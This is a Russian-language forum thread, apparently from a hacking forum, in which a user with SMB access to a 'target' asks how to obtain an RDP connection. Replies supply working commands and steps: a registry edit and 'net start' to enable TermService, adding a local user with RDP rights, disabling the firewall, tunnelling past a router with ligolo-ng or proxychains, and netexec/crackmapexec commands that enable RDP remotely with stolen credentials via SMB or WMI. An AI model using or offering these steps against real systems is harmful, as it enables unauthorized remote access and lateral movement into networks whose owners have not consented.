SMB -> RDP

SlowMan · 12.05.2024

Вопрос следующий:
Допустим есть доступ по SMB к таргету. Как можно сделать что бы был коннект по рдп?
Нужен конкретный пример

mirleoinix · 12.05.2024

запустить termserv если он офф
ну и добавить юзера локального с пасом и правами на рдп

SlowMan · 12.05.2024

mirleoinix сказал(а):

запустить termserv если он офф
ну и добавить юзера локального с пасом и правами на рдп

А если рдп порт закрыт?

mirleoinix · 12.05.2024

что значит закрыт? закрыт чем файрволом или сервис не запущен?
выключить фаер если есть права, поменять порт для рдп и тд

SlowMan · 12.05.2024

mirleoinix сказал(а):

что значит закрыт? закрыт чем файрволом или сервис не запущен?
выключить фаер если есть права, поменять порт для рдп и тд

Закрыт на уровне роутера предположим.
Какие есть варианты?

mirleoinix · 14.05.2024

найти какой открыт порт и поднять рдп на нем

rwxrwx · 14.05.2024

To enable RDP from a command line via SMB access:

1- reg add HKLM\System\CurrentControlSet\Services\TermService /v Start /t REG_DWORD /d 0x00000003 /f

2- net start termservice

xargs · 15.05.2024

если "закрыт" для внешнего мира но открыт для локальных сетей тогда пробросить порт (ligolo-ng) . Но для начала нужно собрать информацию минимальную: 1) запущена ли служба RDP, winrm 2) юзер имеет нужные разрешения через группы

downshifter · 15.05.2024

nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

kamzzzzz · 15.05.2024

downshifter сказал(а):

nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

nxc это типа новая версия cme, поддержку которго прекратили?

kamzzzzz · 15.05.2024

SlowMan сказал(а):

Закрыт на уровне роутера предположим.
Какие есть варианты?

Если он закрыт внешне на роутере, то пробросить прокси\тунель.
И дальше работать проксичейном из локальной сети, в 90% случаев это решит проблему.
Дальше если он не работает, то Выше писали команду для активации термсерва.
Если не срабатывает, то оффаем фаервол на нужной тачке

Sec13B · 20.05.2024

downshifter сказал(а):

nxc smb 192.168.1.1 -u user -p pass -M rdp

Enables/Disables RDP

About Module : -M rdp , all are inefficient.

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=smb ACTION=enable-ram

crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable
crackmapexec or nxc smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS -M rdp -o METHOD=wmi ACTION=enable-ram

RocketRacoon · 21.05.2024

GitHub - XiaoliChan/wmiexec-Pro: New generation of wmiexec.py

New generation of wmiexec.py. Contribute to XiaoliChan/wmiexec-Pro development by creating an account on GitHub.

github.com

Take a look at this, i have tested and it works like a charm

SMB -> RDP

SlowMan

(L3) cache

mirleoinix

HDD-drive

SlowMan

(L3) cache

mirleoinix

HDD-drive

SlowMan

(L3) cache

mirleoinix

HDD-drive

rwxrwx

(L3) cache

xargs

Quad Robber

downshifter

RAID-массив

kamzzzzz

(L1) cache

kamzzzzz

(L1) cache

Sec13B

(L3) cache

RocketRacoon

RAM

GitHub - XiaoliChan/wmiexec-Pro: New generation of wmiexec.py